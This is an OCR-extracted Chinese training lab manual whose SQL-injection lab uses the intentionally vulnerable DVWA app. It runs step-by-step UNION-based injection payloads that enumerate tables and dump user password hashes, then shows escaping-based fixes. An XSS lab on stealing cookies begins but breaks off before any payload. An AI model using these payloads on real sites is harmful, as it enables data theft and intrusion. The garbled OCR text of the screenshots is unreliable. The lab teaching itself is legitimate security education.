信息安全發(fā)展態(tài)勢與知識拓展實訓項目指導手冊

信息安全發(fā)展態(tài)勢與知識拓展

實訓項目指導手冊

V1.0

闔大支喊/抵斫號帆

OWODONOKVlfOMCOFKD^YW*MOCOMtfKt尋真求是格物致知

目錄

Web安全應用分析之SQL注入及防護配置2

實驗概述2

實驗環(huán)境2

前提條彳牛2

實驗;耀2

實驗目標3

任務1環(huán)境準備3

任務2判斷注入點5

任務3猜測字段數(shù)7

任務4執(zhí)行Union聯(lián)合查詢9

任務5獲取數(shù)據(jù)10

任務6SQL注入防護13

,支N午喊才抵斫多忱

I尋真求是格物致知

?CUMCXM3KivTEOMCBIO4TW?MO(XMKi

Web安全應用分析之SQL注入及防護配置

實驗概述

SQL注入是比較常見的網(wǎng)絡攻擊方式之一，它不是利用操作系統(tǒng)的BUG來實現(xiàn)攻擊，

而是針對程序員編寫時的疏忽，通過SQL語句，實現(xiàn)無賬號登錄，甚至篡改數(shù)據(jù)庫。凡有

SQL注入漏洞的程序都是因為程序要接受來自客戶端用戶輸入的變量或URL傳遞的參數(shù),

并且這個變量或參數(shù)是組成SQL語句的一部分。

DVWA（DamVulnerableWebApplication）是用PHP+Mysql編寫的一套用于常規(guī)

Web漏洞教學和檢測的Web脆弱性測試程序。提供Low、Medium.High.Impossible

四個安全級別，包含了SQL注入、XSS、CSRF等常見的Web安全漏洞。

HackBar是Firefox提供的插件，主要功能有：網(wǎng)址的載入訪問、聯(lián)合查詢、各種編碼

/解碼、數(shù)據(jù)加密等。HackBar可以幫助安全人員測試SQL注入、XSS、CSRF等安全漏洞

以及網(wǎng)站的安全性。

實驗環(huán)境

攻擊機:WindowsServer2016（01-Windows攻擊機）,IP:30

靶機:（攻擊機）

WindowsServer201501-WindowsfIP:30

集成環(huán)境：PhpStudy

網(wǎng)站：DVWA-vl.10,low安全級別

前提條件

本實驗要求：

?熟悉Windows基本操作

?熟悉基本的SQL語句

實驗流程

僦％女工里喊才抵斫后帆

KimowcOFM04TW*MOCOMtfKf尋真求是格物致知

實驗目標

完成本實驗后,將能夠：

?了解SQL注入原理

?掌握基本SQL注入方法

?掌握SQL注入漏洞防護方法

任務1環(huán)境準備

【任務目標】

啟動動態(tài)網(wǎng)站集成環(huán)境，并訪問SQL注入站點。

【任務步驟】

1.啟動動態(tài)網(wǎng)站集成環(huán)境

雙擊桌面的"phpstudy"集成環(huán)境,并單擊“啟動"按鈕，運行網(wǎng)站。

2.瀏覽器訪問SQL注入站點

雙擊桌面的"火狐瀏覽器"，在URL地址欄中輸入：

/dvwa/login.php

OWIIOMIKUTCOWCvNOUSWMOaaaea尋真求是格物致知

輸入默認賬號和密碼登錄網(wǎng)站：

賬號：admin

密碼：password

文GDKB00歷史⑸=?5?IJKD-OX

■WHcome:QimnVulnrX+

G0127X).0.1/dvw4/indcx.phpVHOCQ酉&<CtH^K>☆6?ft?三

D破

WelcometoDamnVulnerableWebApplication!

InstructionsDeemXMheraUeWebAppiKalon(UVWA)isaPHRtlySOlw?0ap(M>caikr)thatisdaninAiheraErieitsmam

90alt$tobeanaidlocseorrtyprotessKX^Htoleslttwr$kil$andlooKmBtegalenvironment,3的

SMup/Rts?tD6develo阿sbetterundwstandtheprocessesofsecunngwebappUabons?*1loaidbothstudents&teachersio

2naixxitwebappicabon$ecur<yinaconlroMedclassroomenvronmen

BruteForsTNeanofDVWA?Iopfeetic*ofmo?tcommonw*bvuln*r?bMM”withvaHoueof

dWWcuWyasmpteWQhttorwaBCeclKg

CommandInjection

CSRF

FileInclusionGeneralInstructions

FileUploadItt$upIotheuserhowgyappeoechDVWAE<herbywodongtroughmfi<ymoduleXafncedteveior

sotocbrganymodUoandworknguploroachthohghoatovoitheyc4nbetoconxwngontothonextonoThora

InMeurtCAPTCHAsnotafucodobfcctlocompkrtcamodulohowevofusersstuxAlio<HthattwryhavesucccnsliJtyaxplotodth?

systemasbestastheyposs<?tecouldMusriflMpartKuiarwhmaMfty

SQLlection

SQLl*cttoa(Blind)Re?ono<otbcfcarcbothdocumentedandundocumentedvulnerabeltywiththssoftwareThisti

ntentKnalYouaregneour899dlohyandOscover夠manyessu^saspossible

WeakSessionIDs

DVWAalsondudesaWebAfpicabonFrewal(WAF),PHP1DS.wtKhCMbeenabled81anysiaoeloftjrthec

XSS(DOMJocreasethedrtkulfyThtswildemonstratehow83ngancMherlayerorsecuritymayMockcenanmalicious

?ctcmiNot?.th?f?nhiovanouspubk:nwKhodsAtbypassingthw?protecliom《soMamg3nas*m

XSS(Reflected)axtonsonformoreat}wteedusontjl

XSS(Stored)

Iggtiarw^>buttonatttwbotlocnoleachwhichalowsyouloviewIwKs&bpstorthat%Vh?rablt)f

C$PByptwThere*eatooadducnaisnksforfunhecbddyyoundreodng,whthrelatwtor*atsecuntyissue

單擊左側菜單導航欄的“SQLInjection",進入SQL注入頁面。

裝笑尋真求是格物致知

任務2判斷注入點

【任務目標】

利用加單引號等方式，判斷頁面是否存在注入點。

【任務步驟】

1.判斷是否存在注入點

在輸入框中，輸入：1并單擊"Submit"按鈕提交。

HomeVulnerability:SQLInjection

Instructions

Setup/ResetDBUserIDjSubmit

ID:1

BruteForceFirstnano:admin

Surnaae:adnin

CommandInjection

CSRF

FileInclusionMoreInformation

FileUpload?http?：/Awww.—curit-m.com/?tcurityfvitw?/6DP0N1P76E.html

?一口…

InsecureCAPTCHASQIRL

?MtptWwwwJWteoartc-Wblo<tfwb-curity/，qldnject)onYhejt《htV

?hftp$:@mEunlty/|ttti>ClcWSQL

EESS—?https

SQLInjection(Blind)

頁面回顯了ID為1的用戶姓名信息，說明頁面正常。

繼續(xù)在輸入框中，輸入：1'并單擊"Submit”按鈕提交。

闔I大支N午囁才抵斫夕自

OW0OONOKUTKIMC9iMmMOCOMBtt尋真求是格物致知

D

HomeVulnerability:SQLInjection

Instructions

UserID卜ISUE

Setup/ResetDB

BruteForce

CommandInjectionMoreInformation

CSRF

FileInclusion

FileUpload

InsecureCAPTCHA

SQLInjection(Blind)

文*E)0■㈤歷史(S=HS(6)TJKD*W)(H)-

1270.0.1/dvwaMilnefdbilititX+

?①127?0.0.1/dvw<Mjlrk|li/?id=1'&Sub<nit=Submit#■■8MCd百St<CUi/K>☆總?俞

TewhavoanerrorinyourSQL加3,chockth?ninualthatccar^^andBtoyourlySQLcarvarvorsicnforth?rightsyntaxtous。noir**f**atlino1

頁面報錯并顯示了錯誤信息，根據(jù)錯誤信息可以了解到此錯誤為語法錯誤，數(shù)

據(jù)庫類型為MySQL。

注：因為該站點為字符型注入漏洞，所以需要構造閉合語句。

構造如下閉合邏輯語句：

1'and1=1#

可以看到語句能夠成功被服務器執(zhí)行，并顯示正常的頁面信息。

繼續(xù)構造閉合邏輯語句：

1'and1=2#

支N午囁*抵斫多忱

"MMfiMMlOUmMCVRMTMMOOOMBCI尋真求是格物致知

可以看到語句能夠成功被服務器執(zhí)行，但頁面沒有正常信息回顯。

根據(jù)以上執(zhí)行結果判斷，該頁面確定存在SQL注入漏洞。

任務3猜測字段數(shù)

【任務目標】

通過orderby猜測查詢的字段數(shù)量。

【任務步驟】

1.猜測字段數(shù)為10

構造如下閉合語句：

1'orderby10#

Vulnerability:SQLInjection

UserID:[rorderby10#Submit

MoreInformation

?/securjtvreviews/5DP0N1P76E.html

?http6：〃en.wikipedia.oro^iki/SQLinjection

?http8：〃/bloq/web-8ecurity/s-ctionYheat-sheet/

?https:〃owaso.orcAyww?conimunity/attack6/SQLInjection

?/

頁面報錯，并顯示不存在10個長度的字段，說明字段數(shù)小于10。因此范圍在I

到10之間。

翁1%支噴才投斫后帆

tuMOCMiKUTEOMCvNOUSWMOcoaea尋真求是格物致知

文件(￡)編鋁⑹查看Q)歷史(S)書簽⑥工具(D幫助(H)

httpV/127.0bmit=Submit#X+

<</dvwa/vulnerabili：ies/sqli/?id=T+order+by+10?1U焦C5百度<Ct”+K>

Unknowncolumn'10'in,orderclause'

2.猜測字段數(shù)為5

一般采用"二分”方法來猜測字段數(shù)，如：第一次猜測為100,下一次為50,

再下一次為25以此類推，直到猜出正確的字段數(shù)。

繼續(xù)構造：

1'orderby5#,同樣顯示錯誤，說明數(shù)量不為5。

文件(E)據(jù)運⑹查看(V)歷史(S)書簽(B)工具(I)幫助(H)

http://127.0bmit=Submit#X+

6：①/dvwa/vulnerabilities/sqli/?id=1'+order+by+5+%電賽GQ百度

Unknowncolumn'5'inJorderclause1

3.猜測字段數(shù)為3

繼續(xù)構造：

1'orderby3#,同樣顯示錯誤，說明數(shù)量不為3。

文件(B??(E)查看M歷史(S)書釜(B)工具CD幫助(H)

http://127.0bmit=Submit^X+

6/dvwa/vulnerabilities/sqli/?id=1'+order+by+3+%。賽Cd百度<Ctrl+K>

Unknowncolumn'3'in*orderclause,

年支喊才抵斫字帆

awoocM)KimoMCOFveusrmMOCOMOQ尋真求是格物致知

4.猜測字段數(shù)為2

繼續(xù)構造：

11orderby2#,頁面顯示正常，說明字段數(shù)量為2。

Vulnerability:SQLInjection

UserID:￡orderby2#Submit

ID:1'orderby2#

Firstname:admin

Surname:admin

MoreInformation

?/6ecurrtyreviews/5DP0N1P76E.html

?https:〃en.wikipedia.orBwiki/SQLinjection

?httD8：//spari(/bloQ/web-8ecuritv/s-ctionYheat-sheet/

?http6：〃owasp.ora/wwwvommunltv/attacks/SQLInjection

?https://bobbv-tables.cofn/

任務4執(zhí)行Union聯(lián)合查詢

【任務目標】

通過執(zhí)行union聯(lián)合查詢，確定回顯位置。

【任務步驟】

1.構造聯(lián)合查詢語句

確定查詢字段數(shù)量后，可以通過聯(lián)合查詢語句來確定數(shù)據(jù)回顯的位置，最后通過

該位置獲取數(shù)據(jù)庫中的敏感信息。

構造如下語句：

11unionselect1,2#,有多少個字段數(shù),select后面就加上對應的數(shù)字。

年支^曾喊才抵斫字帆

OMMIOCM}KimOMCOFiCuSTmMOCCMtKf尋真求是格物致知

Vulnerability:SQLInjection

UserID:|_____Submit

ID:1,unionselect1,2i

Firstname:admin

Surname:admin

ID：1'unionyelect1,21

Su^namSrr]—此處的1和2即為回顯位置

MoreInformation

?https:/9ecuritvreview8/5DP0N1P76E.html

?https:〃en.wikloedia.orafwikl/SQLiniection

?sparkercom/bloq/web?securitv/sqHniection-ch-eet/

?https://owagp.oro/wwwcommunitv/attacks/SQLIniection

?/

任務5獲取數(shù)據(jù)

【任務目標】

通過構造并執(zhí)行unionselect查詢語句,獲取數(shù)據(jù)庫中的數(shù)據(jù)信息。

【任務步驟】

1.獲取數(shù)據(jù)庫相關信息

通過內(nèi)嵌函數(shù)version。，database。等獲取數(shù)據(jù)庫版本信息和數(shù)據(jù)庫名。

構造語句：

1'unionselectversion(),database()#

Vulnerability:SQLInjection

UserID:|Submit

ID:1*unionselectversion(),database()#

Firstname:admin

Surname:admin

ID:1,unionselectversion()database()I

Firstname:5.5.53

Surname:dvwa

MoreInformation

?/securitvreview8/5DP0N1P76E.html

?https:〃en.wildpedia.orafwikl/SQLinlection

?sparkercom/bloq/web-securitY/sql-iniection~ch-eet/

?https://owa9P.orQ/wwwcommunitv/attacks/SQLIniection

?/

支喊才抵斫多虎

OW??CNOKimOMCOFMOcawa尋真求是格物致知

得到數(shù)據(jù)庫名為：dvwa,MySQL數(shù)據(jù)庫版本為5.5.53。

2.獲取數(shù)據(jù)庫表名

在MySQL版本大于5時,默認存在information_schema庫，該庫中存在其

他庫的所有數(shù)據(jù)。

根據(jù)已經(jīng)獲得的信息，繼續(xù)構造語句，獲取數(shù)據(jù)庫表名：

1'unionselecttable_name,2frominformation_schema.tableswheret

able_schema='dvwa'#

Vulnerability:SQLInjection

UserID:[Submit

ID:1?unionselecttabl€_namer2frominformation_schema.tableswheretable_sclema-tdvwa*t

Firstname:admin

Surnanve:admin

ID:1,unionselecttable-namcz2frominformation_schema.tableswheretable_sciema=?dvwa??

Firstname:guestbook

Surnanie:2

ID:1?unionselecttable_name,2frominformation_schenMi.tobieswheretable_sc>ema=*dvwa*I

Firstname:users

Surname:2

MoreInformation

可以看到，在1的回顯位置上，顯示了兩張數(shù)據(jù)庫表名：guestbook,users.其

中users表名存在管理員帳號密碼可能性最大。

3.獲取字段名

繼續(xù)構造聯(lián)合查詢語句，獲取users表的字段名：

1'unionselectcolumn_name,2frominformation_schema.columnswh

eretable_schema='dvwa'andtable一name='users'#

Vulnerability:SQLInjection

UMr10:Subcrw：

ID:1,unionsalactfrcalnfomation_schama.columnswbaratablo^ichama*'dvwa'andtabla_n<knA?ausors(■

Pirstna?e:acbiin

Surname:adam

ID:1,1nmfro*intorMtion_sch<m*.coluamtwMr?table_cMM^'dvwa*andI

Firstnase:user-id

Surnanft：2

ID:11unio>selectc?！縐Lnjdm,：frominfornation_schema.columnswb?retdble_jchema?*dvwa?andtoble_najw?,users,I

Firstnaso:flrst_nAna

Surname:2

ID:1?unioiselectcolfro?infornation__schema.columnswheretable_schema*,dvwa,andtable_nan???users,I

firstna?e:lasjnag

Surnam:2

ID:1,unioiselectcoliaai_n^me,2fro?mforn^tion-schema.colxiainswheretable_schemastdvwatandtable-nanjea,users?t

Firstnasc:user

Surname:2

ID:1?unioiselectcolHTJIname,：froaainforn^tionschcma.columnswheretable;chcma-tdvwa,andtable_nanjc<?ausers?$

Firstnase:password

Surname:2

ID:1?unioiselectcoli?n_nan)e2freminfornAtion_schema.columnswheretable_schema**<!￥*??andtable_nan???users?i

Firstnaxe:avatar

Surname:2

得到8個字段名，猜測userfflpassword字段分別存在賬號和密碼。

夕OMMOONOKUTKMViMmOOM0CI尋真求是格物致知

4.獲取字段內(nèi)容

構造SQL查詢語句，獲取字段use杯口password里面的內(nèi)容:

1'unionselectuser,passwordfromusers#

Vulnerability:SQLInjection

UserID:|Submit

ID:1,unionselectuser,passwordfromusers*

Firstname:admin

Surname:admin

ID:1,ust

Firstnate:admin

Surname:5￡4duu3b5aa765d61d8327deb882u￡99

ID:1?unionselectuserzpasswordfromusers#

Firstname:gordonb

Surname:e99al8c428cb38d5f260853678922e03

ID:1?unionselectuser,passwordfromusers#

Firstname:1337

Surname:8d3533d75ae2c3966d7e0d4fcc69216b

ID:1*unionselectuser,passwordfromusers#

Firstname:pablo

Surname:0dl07d09f5bfce40cade3de5c71e9e9b7

ID:1?unionselectuser,passwordfromusers*

Firstname:smithy

Surname:5f4dcc3b5aa765d61d8327deb882cf99

最終得到5個用戶的賬號和密碼，其中包括管理員賬號和密碼：

admin/5f4dcc3b5aa765d61d8327deb882cf99

5.密碼解密

由于多數(shù)站點的默認數(shù)據(jù)庫用戶密碼加密方式為：MD5哈希算法，而dvwa站

點默認也是采用此算法進行密碼加密。因此，可以將密碼放到在線解密網(wǎng)站進行

解密。

例如：

14支N午囁*抵斫多忱

/tumoocM）KuitOMCvNOUSTW*MOccMKf尋真求是格物致知

最終得到admin用戶的密碼為password

任務6SQL注入防護

M弗目標】

通過在頁面中加入防護代碼,實現(xiàn)對SQL注入漏洞的代碼級防護效果。

【任務步驟】

1.mysqLreal_escape_string()函數(shù)

mysql_real_escape_string()函數(shù)可以將用戶輸入的特殊字符進行轉義。轉義

的特殊字符包括：\x00

'（單引號）

"（雙引號）

\xla

進入C:\phpStudy\PIIPTutorial\WWW\DVWA\vulnerabilities\sqli\source\

文件夾，編輯low.php文件。

將$id=$_REQUEST['id'];修改為

$id=mysql_real_escape_string（$_REQUEST['id']）;

)大支N午噴才抵斫個帆

@尋真求是格物致知

UfCAphgtudy\PHPTu?x6WWW\DVWA\vUhewbHitF；$qiMoureVow.phpNottfMd??|Admini$trat<x)-OX

文KF)MlE)W?(S)?B???(N)i8Ba)??(T|111(0)京M)運行四?5(P)?O(W)?

a

。，區(qū)90rt9C?、?二FBI，■/曲組?3■町?■>Q?

日18.陽引

1?<?php

3iffisset($_REQUEST[?Submit*))){

4//Getinput

|$id=mysql_real_escape_string($_REQUEST(*id*))*1

//Checkdatabase

M

$query="SELECTfirst_namerlast_nameFROMusersWHEREuser_id='$id*;;

Mw",

$result=mysqli_query($GLOBALS(mysqliston]r$query)ordie(<pre>

//Getresults

121rwhile($row-mysqli_fetch_assoc($result)){

13//Getvalues

$first-$row[Mfirst_nameM];

$last-$row

17//Feedbackforenduser

$html.=R<pre>ID:!$id)<br/>Firstname:{$first}<br/>Surname:{$last)<

19}

20

mysqliclose($GLOBALS('*my^qlistonH));

保存并退出編輯。

2.驗證漏洞修復結果

在SQL注入頁面中，執(zhí)行1'and1=1#語句。

文杵(D查?儀)歷史⑸書25?IM(DWK11)

■Vulnerability:SQLinject-X+

612/O.ai/dvwaZvulnefabii>3DU%23&Sub■■CQ國T<a臺?翁今

D

HomeVulnerability:SQLInjection

Instructions

Setup/ResetDBUserIDrand1-1?Submit

BruteForce

CommandInjoctionMoreInformation

CSRF

FileInclusion

FileUpload

InsecureCAPTCHA

SQLInjection(Blind)

WeakSessionIDs

XSS(DOM)

XSS(R*n?ct?d)

vee

可以看到頁面已經(jīng)不再顯示任何內(nèi)容，也沒有報錯提示，說明漏洞已經(jīng)修復成

功。

3.addslashes()函數(shù)

addslashes。函數(shù)同樣可以將特定字符進行轉義,從而達到修復效果。

進入C:\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\sqli\source\

文件夾，編輯low.php文件。

筱大支"喊才抵樞自

euMMM?am?MevveumMOOOMKI尋真求是格物致知

將$id=$_REQUEST['id'];修改為

$id=addslashes($_REQUEST['id']);

4.驗證漏洞修復結果

在SQL注入頁面中，執(zhí)行1'and1=1#語句。

Vulnerability:SQLInjection

UsorID:T?nd1=1sSubmit

BruteForce

CommandInjectionMoreInformation

CSRF

FileInclusion

Fil?Upload

InsecureCAPTCHA

可以看到頁面已經(jīng)不再顯示件可內(nèi)容，也沒有報錯提示，說明漏洞已經(jīng)修復成

功。

注：上述修復方式并非完全修復漏洞，攻擊者仍然有多種方法可以利用漏洞。

年支喊才抵斫字帆

awoocM)KimoMCOFveusrmMOCOMOQ尋真求是格物致知

至此，實驗結束。

展委二呼喊埼投折字悅

GUANGDONGPaYTECHNCOFINDUSTRYANDCOMMERCE

信息安全發(fā)展態(tài)勢與知識拓展

實訓項目指導手冊

V1.0

OMMODCM)KUTECHCOFRDiSTW*MOCOMtfKl尋真求是格物致知

目錄

XSS跨站腳本點擊劫持分析及防護18

概述18

實驗環(huán)境18

前提條彳牛18

實驗;府呈18

實驗目標18

任務1反射型XSS漏洞利用19

任務2存儲型XSS漏洞利用22

任務3XSS漏洞防護29

午喊/抵叫多忱

CUMCXM3KVTBOHCBiMTmMOCOMKi尋真求是格物致知

xss跨站腳本點擊劫持分析及防護

概述

跨站腳本攻擊XSS(CrossSiteScripting)是惡意攻擊者往Web頁面里插入惡意Script

代碼，當用戶瀏覽該頁之時，嵌入其中Web里面的Script代碼會被執(zhí)行，從而達到惡意攻

擊用戶的目的。XSS攻擊針對的是用戶層面的攻擊，可以用來進行釣魚攻擊、前端js挖礦、

用戶cookie獲取，甚至可以結合瀏覽器自身的漏洞對用戶主機進行遠程控制等。XSS跨站

腳本攻擊分為三類：反射型XSS(reflected).存儲型XSS(stored),DOMBasedXSS。

本實驗使用的靶場環(huán)境為：DVWA、bWAPP。

實驗環(huán)境

攻擊機:WindowsServer2016(01-Windows攻擊機),IP:30

靶機:WindowsServer2015(03-Windows靶機),IP:56

前提條件

本實驗要求：

?熟悉Windows基本操作

?熟悉基本的PHP函數(shù)和HTML標簽

實驗流程

反射型XSS漏洞利用存儲型XSS漏洞利用XSS漏洞防護

實驗目標

完成本實驗后，您將能夠：

?掌握xss漏洞基本利用方法

?掌握利用XSS獲取用戶cookie的方法

?掌握xss漏洞的代碼級防護方法

闔I大支N午囁才抵斫夕自

OW0OONOKUTKIMC9iMmMOCOMBtt尋真求是格物致知

任務I反射型XSS漏洞利用

【任務目標】

構造XSS代碼，觸發(fā)反射型XSS攻擊,并通過反射型XSS漏洞，獲取用戶

信息。注：本實驗靶場為：

cookieDVWAO

【任務步驟】

1.靶機開啟網(wǎng)站環(huán)境

在靶機上，運行PhpStudy網(wǎng)站環(huán)境。

2.攻擊機訪問靶機DVWA站點

在攻擊機打開瀏覽器訪問http:〃〈靶機IP>/dvwa/login.php,賬號：admin,

密碼：password

文杵(E)Wib歷史&)引答(fi)工具(D.口X

login::DamnVulnerableV/.X+

4?①「92.168200.156/dvw“l(fā)ogin.php|『S?Cd百度<CtthK>Q自4?俞與三

闔％支N午囁才抵斫夕自

OUIMOOONOIOUTKMOFmmMOCOMSKI尋真求是格物致知

3.設置安全等級

在DVWA首頁，單擊左側菜單欄"DVWASecurity",將安全等級設置為:

low。

文aDMID歷史0襁@[，0)*皿